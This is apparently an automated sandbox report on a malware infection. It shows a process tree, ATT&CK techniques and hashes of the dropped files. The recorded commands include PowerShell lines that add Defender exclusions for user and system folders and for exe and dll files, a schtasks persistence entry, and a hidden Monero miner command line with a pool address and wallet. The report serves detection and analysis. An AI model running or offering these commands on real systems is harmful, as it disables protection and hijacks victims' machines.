        C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff75c919e70,0x7ff75c919e80,0x7ff75c919e90
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2132
    - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1764,9901890697463367246,2548333112286912778,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2312_916672664" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1772 /prefetch:2
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4828
    - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1764,9901890697463367246,2548333112286912778,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2312_916672664" --mojo-platform-channel-handle=1828 /prefetch:8
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:2180
    - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1764,9901890697463367246,2548333112286912778,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2312_916672664" --mojo-platform-channel-handle=2336 /prefetch:8
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:5088
    - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1764,9901890697463367246,2548333112286912778,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2312_916672664" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=1920 /prefetch:1
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4480
    - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1764,9901890697463367246,2548333112286912778,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2312_916672664" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2476 /prefetch:1
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4820
    - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1764,9901890697463367246,2548333112286912778,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2312_916672664" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3288 /prefetch:2
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:3792
    - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1764,9901890697463367246,2548333112286912778,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2312_916672664" --mojo-platform-channel-handle=2296 /prefetch:8
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:3656
    - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1764,9901890697463367246,2548333112286912778,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2312_916672664" --mojo-platform-channel-handle=3964 /prefetch:8
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4184
    - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1764,9901890697463367246,2548333112286912778,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2312_916672664" --mojo-platform-channel-handle=3692 /prefetch:8
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:2496
    - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1764,9901890697463367246,2548333112286912778,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2312_916672664" --mojo-platform-channel-handle=2368 /prefetch:8
        5⤵
        
        PID:1244
    - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1764,9901890697463367246,2548333112286912778,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2312_916672664" --mojo-platform-channel-handle=2584 /prefetch:8
        5⤵
        
        PID:4580
- C:\Users\Admin\AppData\Local\Temp\ebook.exe
  "C:\Users\Admin\AppData\Local\Temp\ebook.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1972
- C:\Users\Admin\AppData\Local\Temp\anytime1.exe
  "C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4836
- - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1136
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:764
    - - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5076
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2988
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4868
    - - C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        5⤵
        
        PID:4940
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:4644
    - - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Windows\system32\services64.exe"
        5⤵
        
        PID:4484
      - C:\Windows\system32\services64.exe
        
        C:\Windows\system32\services64.exe
        6⤵
        Executes dropped EXE
        
        PID:216
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
        7⤵
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4732
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        8⤵
        
        PID:3444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4364
        
        C:\Windows\system32\Microsoft\Libs\sihost64.exe
        
        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
        8⤵
        Executes dropped EXE
        
        PID:2304
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        9⤵
        
        PID:4468
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.sprite/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6D5Kw+SNPLfPB2ukC//O063ow4gpmyCIpKu2yHpDxuv7" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4928
- C:\Users\Admin\AppData\Local\Temp\anytime2.exe
  "C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3868
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 3868 -s 1688
    3⤵
    - Program crash
    PID:2640
- C:\Users\Admin\AppData\Local\Temp\anytime3.exe
  "C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4668
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 4668 -s 1696
    3⤵
    - Program crash
    PID:3056
- C:\Users\Admin\AppData\Local\Temp\anytime4.exe
  "C:\Users\Admin\AppData\Local\Temp\anytime4.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4632
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 4632 -s 1688
    3⤵
    - Program crash
    PID:2404
- C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
  "C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4728

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Loads dropped DLL
PID:672
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 672 -s 600
  2⤵
  - Program crash
  PID:4164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 672 -ip 672
1⤵
PID:2948

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 436 -p 3868 -ip 3868
1⤵
PID:1860

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 456 -p 4668 -ip 4668
1⤵
PID:548

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 436 -p 4632 -ip 4632
1⤵
PID:4312

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 452 -p 4728 -ip 4728
1⤵
PID:1204

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:976

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Temp\123.exe

Filesize
1.4MB

MD5
1e3dba0969fd9c1d692a23a8ec589ae5

SHA1
95a5b0d1807ae68e149712b4c89ecbb800a8660b

SHA256
4f42851b11bb67d7fd25a2fb889938b494c2bb47eaea029140472fad07ddd93d

SHA512
4f276fc7488f1b7af6720890e7c488b0920cba8fc6779584e80860dbf1bc8f42b704ecd41806895f5ad140dd5f6ad52b5f7f87b36ab24ff8372e4988039eb68f

Download Submit
C:\Users\Admin\AppData\Local\Temp\123.exe

Filesize
1.4MB

MD5
1e3dba0969fd9c1d692a23a8ec589ae5

SHA1
95a5b0d1807ae68e149712b4c89ecbb800a8660b

SHA256
4f42851b11bb67d7fd25a2fb889938b494c2bb47eaea029140472fad07ddd93d

SHA512
4f276fc7488f1b7af6720890e7c488b0920cba8fc6779584e80860dbf1bc8f42b704ecd41806895f5ad140dd5f6ad52b5f7f87b36ab24ff8372e4988039eb68f

Download Submit
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

Filesize
2.1MB

MD5
ecbec95fc0b0ca6aee51f5ed6dec2cf0

SHA1
6e1bea66d99a7be247b08cc5af3cb8ec72df62c5

SHA256
ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b

SHA512
a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

Download Submit
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

Filesize
2.1MB

MD5
ecbec95fc0b0ca6aee51f5ed6dec2cf0

SHA1
6e1bea66d99a7be247b08cc5af3cb8ec72df62c5

SHA256
ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b

SHA512
a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

Download Submit
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe

Filesize
54KB

MD5
4885235c19693b3f573539a970b7d4ff

SHA1
8ceceee7e9213725809708c59bd13327029d45b4

SHA256
29ade1efd3ff6b446652e7326906b01e999f39e6ada653affead960689fe334c

SHA512
7d203c7422214b3266579092de90fd272f14391cdba008351193857612897fc1c87f479ca6aafd0b78a5a0aea63749e8f082bb0f8cfaacd6cda8136d06e5ce9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe

Filesize
54KB

MD5
4885235c19693b3f573539a970b7d4ff

SHA1
8ceceee7e9213725809708c59bd13327029d45b4

SHA256
29ade1efd3ff6b446652e7326906b01e999f39e6ada653affead960689fe334c

SHA512
7d203c7422214b3266579092de90fd272f14391cdba008351193857612897fc1c87f479ca6aafd0b78a5a0aea63749e8f082bb0f8cfaacd6cda8136d06e5ce9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\SharkSoftSetup36667.exe

Filesize
136KB

MD5
a7c9b7b39c6a86f4b42e4ef915cf9951

SHA1
642d0903602da37db2ff6b892fccdca3b6c24845

SHA256
4a1798331ee274c6576736ffae7bbd97c6d6e677ffe70eb7a70a3cb68725afd5

SHA512
d5b5d121e7c22a35956a517f2b8be1fc7e1760ca9b1af0cddf784ec0ea1a796eec419f4bcf4be9e1bc35734da59a32f41c2df1667c3e6da6c8295cbf9d04bdf2

Download Submit
C:\Users\Admin\AppData\Local\Temp\SharkSoftSetup36667.exe

Filesize
136KB

MD5
a7c9b7b39c6a86f4b42e4ef915cf9951

SHA1
642d0903602da37db2ff6b892fccdca3b6c24845

SHA256
4a1798331ee274c6576736ffae7bbd97c6d6e677ffe70eb7a70a3cb68725afd5

SHA512
d5b5d121e7c22a35956a517f2b8be1fc7e1760ca9b1af0cddf784ec0ea1a796eec419f4bcf4be9e1bc35734da59a32f41c2df1667c3e6da6c8295cbf9d04bdf2

Download Submit
C:\Users\Admin\AppData\Local\Temp\anytime1.exe

Filesize
8KB

MD5
81b7ab5b9ccd62ef999148c1b510dba7

SHA1
a56ac65cf0095b6d304e38b1abce4ef12355aac5

SHA256
713828c733af9219619b852c4d5421803be95591dc7afaf425554bd40f7b0e4f

SHA512
14d3364c65e8769a7d014daa7518703a24e88ddb96014c4f7d7ea29ab53b555e6164ceb33afae639c81c01c04de7e8f29cdb369e60d8b201b6123b6b7c208a67

Download Submit
C:\Users\Admin\AppData\Local\Temp\anytime1.exe

Filesize
8KB

MD5
81b7ab5b9ccd62ef999148c1b510dba7

SHA1
a56ac65cf0095b6d304e38b1abce4ef12355aac5

SHA256
713828c733af9219619b852c4d5421803be95591dc7afaf425554bd40f7b0e4f

SHA512
14d3364c65e8769a7d014daa7518703a24e88ddb96014c4f7d7ea29ab53b555e6164ceb33afae639c81c01c04de7e8f29cdb369e60d8b201b6123b6b7c208a67

Download Submit
C:\Users\Admin\AppData\Local\Temp\anytime2.exe

Filesize
8KB

MD5
f78b50c5e55af5074d43904a0cfdd51a

SHA1
739b95150a1cd19373a5771d1ed3dc5ebc9ec3f6

SHA256
502b72351144db4beab498c3d6b54cb00f033bec52e87346f78889b0124c50b1

SHA512
a4f7df81ae25c64cb8eef1ab4407c08ab04e19941ee8e23360624c3f6b82c64a7d26278e23ed98e643f02373c68cb9ffc54f4c409c0ed7c280dfa130f63bed30

Download Submit
C:\Users\Admin\AppData\Local\Temp\anytime2.exe

Filesize
8KB

MD5
f78b50c5e55af5074d43904a0cfdd51a

SHA1
739b95150a1cd19373a5771d1ed3dc5ebc9ec3f6

SHA256
502b72351144db4beab498c3d6b54cb00f033bec52e87346f78889b0124c50b1

SHA512
a4f7df81ae25c64cb8eef1ab4407c08ab04e19941ee8e23360624c3f6b82c64a7d26278e23ed98e643f02373c68cb9ffc54f4c409c0ed7c280dfa130f63bed30

Download Submit
C:\Users\Admin\AppData\Local\Temp\anytime3.exe

Filesize
8KB

MD5
6261def6a0f48693ee03d6e3b78d3e1e

SHA1
1a40200f9246f9015be7056bf8b70cfe53a4f685

SHA256
553ed0af8d0b2207aa760880fcc3723f13c5ec7782a5198d964e1ab65e939c95

SHA512
b73357f6e0b7450e10e717d745a4542fcd27d45914147f6ac521d51695cba1c569c3ea7d97c08d3e091b3d41a009b45b5a164ead1f5e286c6fa0dc5592448459

Download Submit
C:\Users\Admin\AppData\Local\Temp\anytime3.exe

Filesize
8KB

MD5
6261def6a0f48693ee03d6e3b78d3e1e

SHA1
1a40200f9246f9015be7056bf8b70cfe53a4f685

SHA256
553ed0af8d0b2207aa760880fcc3723f13c5ec7782a5198d964e1ab65e939c95

SHA512
b73357f6e0b7450e10e717d745a4542fcd27d45914147f6ac521d51695cba1c569c3ea7d97c08d3e091b3d41a009b45b5a164ead1f5e286c6fa0dc5592448459

Download Submit
C:\Users\Admin\AppData\Local\Temp\anytime4.exe

Filesize
8KB

MD5
2c9dff39d65d1f574e8a26d0c28aae7e

SHA1
b416fb8e4c5ace6152f347f09bb93d7f0fb4a488

SHA256
967a8adf0624d2000266b0cf67684aff7dc49fcfacf40105cbe875d89f580050

SHA512
8ecdbb4f62a5da3cb0331df4c4e193b083f254b64aac91c5a29998d5022ab36d84c11abfd58d2a287cc5b8078adf8e3a0b610e3977909d17c0118d05371b18be

Download Submit
C:\Users\Admin\AppData\Local\Temp\anytime4.exe

Filesize
8KB

MD5
2c9dff39d65d1f574e8a26d0c28aae7e

SHA1
b416fb8e4c5ace6152f347f09bb93d7f0fb4a488

SHA256
967a8adf0624d2000266b0cf67684aff7dc49fcfacf40105cbe875d89f580050

SHA512
8ecdbb4f62a5da3cb0331df4c4e193b083f254b64aac91c5a29998d5022ab36d84c11abfd58d2a287cc5b8078adf8e3a0b610e3977909d17c0118d05371b18be

Download Submit
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

Filesize
8KB

MD5
7e0c9f9cfc484458863bac278f60bd1f

SHA1
d21c724ed2b17e1e9d6cd8974de5097421a99d40

SHA256
37017d82e5d7b196eea722ec75a2a5a044044c202494e9e0ee4524a73ad299e5

SHA512
92226a087cc622d90c139de79c5e1ccd1735a915729ace9dfee17cf02ba453f3592c9c7160f8f1dc1baf25330021f9aef5a79a09bab9f046a4ab80cddbd07de5

Download Submit
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

Filesize
8KB

MD5
7e0c9f9cfc484458863bac278f60bd1f

SHA1
d21c724ed2b17e1e9d6cd8974de5097421a99d40

SHA256
37017d82e5d7b196eea722ec75a2a5a044044c202494e9e0ee4524a73ad299e5

SHA512
92226a087cc622d90c139de79c5e1ccd1735a915729ace9dfee17cf02ba453f3592c9c7160f8f1dc1baf25330021f9aef5a79a09bab9f046a4ab80cddbd07de5

Download Submit
C:\Users\Admin\AppData\Local\Temp\d

Filesize
14.0MB

MD5
058d65bbba1673cf1989333fcb40e295

SHA1
41d92d00756d4f3e460526d436c574f4243327f0

SHA256
e1cc4c5989347c5020c71e69394251a061d36483b9f5e03d15d069ad1a805e95

SHA512
fff0d4b0a69bf1bdd3299d9cfa5722f0cc30121e11bd5de0918af0b9f4234b485e65daf32dc8e9355efd76035f9e475640e6127fb8b49a724c0f000869befd10

Download Submit
C:\Users\Admin\AppData\Local\Temp\d

Filesize
14.0MB

MD5
d479306a85c2b53322bfd52044e09ec5

SHA1
e334fa87f8eaf2f9ee04dbbaea57e64db9b0e37f

SHA256
2e0a8a30138baa6025f412b784c25fb86f3838bbbf53a6347efb645e9b22228a

SHA512
13957cc0929422fad7f55e20c6f3635b9d2e6c08a6f8dae5bd55b2f4158970cc8307bee4abf1ddf99de931bedea448cc2d5c369f8d4d2e5c95f97182a9cceab2

Download Submit
C:\Users\Admin\AppData\Local\Temp\d

Filesize
14.0MB

MD5
998bc2ec939de3c785d45b3bb9073da5

SHA1
a8343819195e7cdd2cdbb76c6ae89eb04e861696

SHA256
94b0446e5ee80d2bc24e8f4ab21f3d05b6fbc54ecf10e7c837c72b4c8cf8aa10

SHA512
2797f26f8b85f855e82d369dcca8d6f06a0e8f2ad7013aa83398acaed14d0c8d096f211e8dc13d7804a03e968fa7deeaa16b9b6c62d1f6ab9adcfdb6161f1269

Download Submit
C:\Users\Admin\AppData\Local\Temp\d

Filesize
14.0MB

MD5
11aff5f96994c18fbca2e14e55f98a21

SHA1
daeec0dbf63d3d98daecf9846f65878fcdf2f810

SHA256
a8583c7cd37bbcbbd42111ee4f778040c85bab319df430f143c2bb9e9b505c52

SHA512
bf98feb3baee6e3ebc5f0a77e2c846ef5bb2551af6bd4b90217f7cc8a5d1bad35d151347fc3563b773f637ef1188190726d35670bd8b092553cdc8fb1883c2a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\d

Filesize
14.0MB

MD5
78ee8e4324652e562c77d0b09d81a22e

SHA1
90834c5d8b4875c8d565edd17353c77de3dafb76

SHA256
edbba924faf1157a0af714acb21090d3087aa619300500c3fde97523924d0dd2

SHA512
f1b188b1b83b4b414db11b58b8c950783eb1a821ad1a3eb024f876db46b2583fd33b7ee9d5fb95e50653a58db393aaabe57674a912abf627e5f2a3e3c6615c5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\d

Filesize
14.0MB

MD5
a5fd2156ffe2fd1b2deadf7244f5aaaf

SHA1
efc03fb7c4841359d49d1df528c1ffdcaac9fac0

SHA256
487341fd089f5af499ccf41154ee737699e96af47b8e7d9a11f8320018f86076

SHA512
c7637f3528992503ae52b53dd9a7d4ffccbd30b120c73fd56a89af4b29d8c6381a93793c2c9034a67841c712941ef795375bd1a549e9e813cf021a34b93c0f19

Download Submit
C:\Users\Admin\AppData\Local\Temp\d

Filesize
14.0MB

MD5
bcc0bc644d4b0b49cdc014bc54ca46e6

SHA1
0ab25b6f3960232415e1cc41919c4ee8508e6551

SHA256
df32bcc0c6d19c1f9b2a9e86d1616085cb09cc78e655bf121a3ab088287d16bd

SHA512
0911e6a3571ad7c25cec31928d48bf51e9422e14d838c0cdde060f89e2b7af97a73c75feee4dbc884ea892af53ea50ad2da57cf38794a00308628ab46716067b

Download Submit
